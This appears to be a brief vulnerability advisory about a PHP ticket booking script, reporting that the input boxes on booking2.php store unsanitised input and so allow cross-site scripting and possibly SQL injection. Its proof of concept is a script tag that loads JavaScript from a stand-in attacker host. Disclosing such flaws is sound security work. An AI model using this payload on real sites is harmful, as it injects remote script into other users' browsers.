Ticket Booking Script Homepage: http://www.mole.com.ua Effected files: input boxes on booking2.php XSS Vulnerabilities: The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it to a MySQL db. This can causes XSS examples as well as possible SQL injections. For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes